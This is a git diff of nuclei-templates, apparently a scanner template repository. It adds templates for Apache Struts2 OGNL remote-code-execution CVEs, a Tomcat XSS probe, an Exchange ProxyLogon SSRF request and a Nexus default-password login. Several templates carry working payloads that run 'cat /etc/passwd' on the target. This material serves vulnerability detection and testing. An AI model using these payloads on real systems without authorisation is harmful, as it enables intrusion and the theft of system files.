diff --git a/README.md b/README.md
index 82d6b5e71c..11188aebd6 100644
--- a/README.md
+++ b/README.md
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
-| cves | 221 | vulnerabilities | 105 | exposed-panels | 95 |
-| exposures | 60 | technologies | 50 | misconfiguration | 50 |
-| workflows | 23 | miscellaneous | 16 | default-logins | 17 |
+| cves | 229 | vulnerabilities | 105 | exposed-panels | 100 |
+| exposures | 60 | technologies | 50 | misconfiguration | 51 |
+| workflows | 23 | miscellaneous | 16 | default-logins | 18 |
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
| helpers | 2 | takeovers | 1 | - | - |
-**69 directories, 672 files**.
+**72 directories, 687 files**.
diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml
new file mode 100644
index 0000000000..0d3b5af374
--- /dev/null
+++ b/cves/2007/CVE-2007-4556.yaml
@@ -0,0 +1,29 @@
+id: CVE-2007-4556
+
+info:
+ name: Apache Struts2 S2-001 RCE
+ author: pikpikcu
+ severity: critical
+ reference: https://www.guildhab.top/?p=2326
+ tags: cve,cve2007,apache,rce,struts
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/login.action"
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+ body: |
+ username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2012/CVE-2012-0392.yaml b/cves/2012/CVE-2012-0392.yaml
new file mode 100644
index 0000000000..05a2156fae
--- /dev/null
+++ b/cves/2012/CVE-2012-0392.yaml
@@ -0,0 +1,24 @@
+id: CVE-2012-0392
+
+info:
+ name: Apache Struts2 S2-008 RCE
+ author: pikpikcu
+ severity: critical
+ reference: https://blog.csdn.net/weixin_43416469/article/details/113850545
+ tags: cve, cve2012,apache,rce,struts
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2013/CVE-2013-1965.yaml b/cves/2013/CVE-2013-1965.yaml
new file mode 100644
index 0000000000..b39b275ce9
--- /dev/null
+++ b/cves/2013/CVE-2013-1965.yaml
@@ -0,0 +1,28 @@
+id: CVE-2013-1965
+
+info:
+ name: Apache Struts2 S2-012 RCE
+ author: pikpikcu
+ severity: critical
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2013-1965
+ tags: cve,cve2013,apache,rce,struts
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/user.action"
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+ body: |
+ name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml
index 591593f19b..7bce805f94 100644
--- a/cves/2013/CVE-2013-2251.yaml
+++ b/cves/2013/CVE-2013-2251.yaml
@@ -5,7 +5,7 @@ info:
author: exploitation & @dwisiswant0
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
- tags: cve,cve2013,rce
+ tags: cve,cve2013,rce,struts,apache
requests:
- payloads:
diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml
index de0e0dd738..1e15993eb2 100644
--- a/cves/2016/CVE-2016-3081.yaml
+++ b/cves/2016/CVE-2016-3081.yaml
@@ -1,11 +1,11 @@
id: CVE-2016-3081
info:
- name: S2-032 Struts RCE
+ name: Apache S2-032 Struts RCE
author: dhiyaneshDK
severity: high
reference: https://cwiki.apache.org/confluence/display/WW/S2-032
- tags: cve,cve2016,struts,rce
+ tags: cve,cve2016,struts,rce,apache
requests:
- raw:
diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml
new file mode 100644
index 0000000000..08f492bb34
--- /dev/null
+++ b/cves/2017/CVE-2017-12611.yaml
@@ -0,0 +1,24 @@
+id: CVE-2017-12611
+
+info:
+ name: Apache Struts2 S2-053 RCE
+ author: pikpikcu
+ severity: critical
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-12611
+ tags: cve,cve2017,apache,rce,struts
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml
index 615cf36cac..11d7004986 100644
--- a/cves/2017/CVE-2017-5638.yaml
+++ b/cves/2017/CVE-2017-5638.yaml
@@ -1,10 +1,10 @@
id: CVE-2017-5638
info:
- author: "Random Robbie"
- name: "Struts2 RCE "
+ author: Random Robbie
+ name: Apache Struts2 RCE
severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
- tags: cve,cve2017,struts,rce
+ tags: cve,cve2017,struts,rce,apache
# This template supports the detection part only.
# Do not test any website without permission
diff --git a/cves/2017/CVE-2017-9791.yaml b/cves/2017/CVE-2017-9791.yaml
new file mode 100644
index 0000000000..d627ab66e8
--- /dev/null
+++ b/cves/2017/CVE-2017-9791.yaml
@@ -0,0 +1,33 @@
+id: CVE-2017-9791
+
+info:
+ name: Apache Struts2 S2-053 RCE
+ author: pikpikcu
+ severity: critical
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9791
+ tags: cve, cve2017,apache,rce
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/integration/saveGangster.action"
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+ body: |
+ name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Content-Type: text/html"
+ part: header
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml
new file mode 100644
index 0000000000..5a1193818f
--- /dev/null
+++ b/cves/2017/CVE-2017-9805.yaml
@@ -0,0 +1,87 @@
+id: CVE-2017-9805
+
+info:
+ name: Apache Struts2 S2-052 RCE
+ author: pikpikcu
+ severity: critical
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9805
+ tags: cve,cve2017,apache,rce,struts
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/struts2-rest-showcase/orders/3"
+ - "{{BaseURL}}/orders/3"
+ headers:
+ Content-Type: application/xml
+ body: |
+
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "Debugging information"
+ - "com.thoughtworks.xstream.converters.collections.MapConverter"
+ condition: and
+
+ - type: status
+ status:
+ - 500
diff --git a/cves/2018/CVE-2018-11776.yaml b/cves/2018/CVE-2018-11776.yaml
new file mode 100644
index 0000000000..220780dedd
--- /dev/null
+++ b/cves/2018/CVE-2018-11776.yaml
@@ -0,0 +1,24 @@
+id: CVE-2018-11776
+
+info:
+ name: Apache Struts2 S2-057 RCE
+ author: pikpikcu
+ severity: critical
+ reference: https://github.com/jas502n/St2-057
+ tags: cve,cve2018,apache,rce,struts2
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2019/CVE-2019-0221.yaml b/cves/2019/CVE-2019-0221.yaml
new file mode 100644
index 0000000000..90b1081257
--- /dev/null
+++ b/cves/2019/CVE-2019-0221.yaml
@@ -0,0 +1,34 @@
+id: CVE-2019-0221
+
+info:
+ name: Apache Tomcat XSS
+ author: pikpikcu
+ severity: low
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2019-0221
+ description: |
+ The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
+ 7.0.0 to 7.0.93 echoes user provided data without escaping and is,
+ therefore, vulnerable to XSS. SSI is disabled by default.
+ The printenv command is intended for debugging and is unlikely to be present in a production website.
+ tags: cve,cve2019,apache,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - ""
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-12116.yaml b/cves/2020/CVE-2020-12116.yaml
index 80f6378499..c002797d46 100644
--- a/cves/2020/CVE-2020-12116.yaml
+++ b/cves/2020/CVE-2020-12116.yaml
@@ -6,9 +6,7 @@ info:
severity: high
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
tags: cve,cve2020,zoho,traversal
-
- # References:
- # - https://github.com/BeetleChunks/CVE-2020-12116
+ reference: https://github.com/BeetleChunks/CVE-2020-12116
requests:
- raw:
diff --git a/cves/2020/CVE-2020-14815.yaml b/cves/2020/CVE-2020-14815.yaml
deleted file mode 100644
index 1f227cef61..0000000000
--- a/cves/2020/CVE-2020-14815.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2020-14815
-
-info:
- name: Oracle Business Intelligence XSS
- author: pikpikcu
- severity: medium
- reference: https://www.oracle.com/security-alerts/cpuoct2020.html
- tags: cve,cve2020,oracle,xss
- source: https://twitter.com/HackerOn2Wheels/status/1326927875279380480
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect=%22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E"
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "X-Oracle-Dms-Ecid:"
- - "X-Oracle-Dms-Rid:"
- - "Set-Cookie:"
- part: header
- condition: and
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-17530.yaml b/cves/2020/CVE-2020-17530.yaml
index 38c7823e00..9de289e9fe 100644
--- a/cves/2020/CVE-2020-17530.yaml
+++ b/cves/2020/CVE-2020-17530.yaml
@@ -5,7 +5,7 @@ info:
author: pikpikcu
severity: critical
reference: http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
- tags: cve,cve2020,apache,rce
+ tags: cve,cve2020,apache,rce,struts
# Forced OGNL evaluation, when evaluated on raw user input in tag attributes,
# may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml
new file mode 100644
index 0000000000..f07e465fe3
--- /dev/null
+++ b/cves/2021/CVE-2021-26855.yaml
@@ -0,0 +1,34 @@
+id: CVE-2021-26855
+
+info:
+ name: Exchange Server SSRF Vulnerability
+ author: madrobot
+ severity: critical
+ description: |
+ Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
+ tags: cve,cve2021,ssrf,rce,exchange
+ reference: |
+ - https://proxylogon.com/#timeline
+ - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
+ - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
+ - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
+
+requests:
+ - raw:
+ - |
+ GET /owa/auth/x.js HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
+ Accept-Language: en
+ Connection: close
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "Burp Collaborator Server"
+ part: body
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml
index 4829a293a3..f39c826555 100644
--- a/cves/2021/CVE-2021-3378.yaml
+++ b/cves/2021/CVE-2021-3378.yaml
@@ -24,7 +24,7 @@ requests:
------WebKitFormBoundarySHHbUsfCoxlX1bpS
Content-Disposition: form-data; name="file"; filename="poc.txt"
- Content-Type: imnage/png
+ Content-Type: image/png
POC_TEST
diff --git a/default-logins/nexus/nexus-default-password.yaml b/default-logins/nexus/nexus-default-password.yaml
new file mode 100644
index 0000000000..aecb665d44
--- /dev/null
+++ b/default-logins/nexus/nexus-default-password.yaml
@@ -0,0 +1,31 @@
+id: nexus-default-password
+
+info:
+ name: Nexus Default Password
+ author: pikpikcu
+ severity: high
+ tags: nexus,dlogin
+
+requests:
+ - raw:
+ - |
+ POST /service/rapture/session HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 43
+ X-Nexus-UI: true
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Connection: close
+
+ username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 204
+ - type: word
+ words:
+ - "Server: Nexus"
+ - "NXSESSIONID"
+ part: header
+ condition: and
diff --git a/exposures/configs/exposed-hg.yaml b/exposures/configs/exposed-hg.yaml
index eb1cdf46bd..9f0e619a3b 100644
--- a/exposures/configs/exposed-hg.yaml
+++ b/exposures/configs/exposed-hg.yaml
@@ -10,6 +10,7 @@ requests:
path:
- "{{BaseURL}}/.hg/hgrc"
+ matchers-condition: and
matchers:
- type: word
words:
@@ -19,4 +20,4 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml
index e49e256cce..ecc7dabbdc 100644
--- a/exposures/configs/phpinfo.yaml
+++ b/exposures/configs/phpinfo.yaml
@@ -2,7 +2,7 @@ id: phpinfo-files
info:
name: phpinfo Disclosure
- author: pd-team & daffainfo
+ author: pd-team & daffainfo & meme-lord
severity: low
requests:
@@ -25,9 +25,22 @@ requests:
- "{{BaseURL}}/infos.php"
- "{{BaseURL}}/linusadmin-phpinfo.php"
- "{{BaseURL}}/php-info.php"
+
+ matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '>PHP Version <\/td>| ([0-9.]+)'
\ No newline at end of file
diff --git a/exposures/logs/struts-debug-mode.yaml b/exposures/logs/struts-debug-mode.yaml
index d72731b366..3371fb9fca 100644
--- a/exposures/logs/struts-debug-mode.yaml
+++ b/exposures/logs/struts-debug-mode.yaml
@@ -4,7 +4,7 @@ info:
name: Apache Struts setup in Debug-Mode
author: pd-team
severity: low
- tags: logs,struts
+ tags: logs,struts,apache
requests:
- method: GET
diff --git a/misconfiguration/gitlab-snippets.yaml b/misconfiguration/gitlab-snippets.yaml
new file mode 100644
index 0000000000..b3253b81a2
--- /dev/null
+++ b/misconfiguration/gitlab-snippets.yaml
@@ -0,0 +1,21 @@
+id: gitlab-snippets
+info:
+ name: GitLab public snippets
+ author: pdteam
+ severity: info
+ reference: https://gist.github.com/vysecurity/20311c29d879e0aba9dcffbe72a88b10
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/explore/snippets"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Snippets · Explore · GitLab'
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/technologies/microsoft-echange-server-detect.yaml b/technologies/microsoft-echange-server-detect.yaml
index d06d3b6aa9..b89745b772 100644
--- a/technologies/microsoft-echange-server-detect.yaml
+++ b/technologies/microsoft-echange-server-detect.yaml
@@ -1,4 +1,4 @@
-id: microsoft-echange-server-detect
+id: microsoft-exchange-server-detect
info:
name: Microsoft Exchange Server Detect
|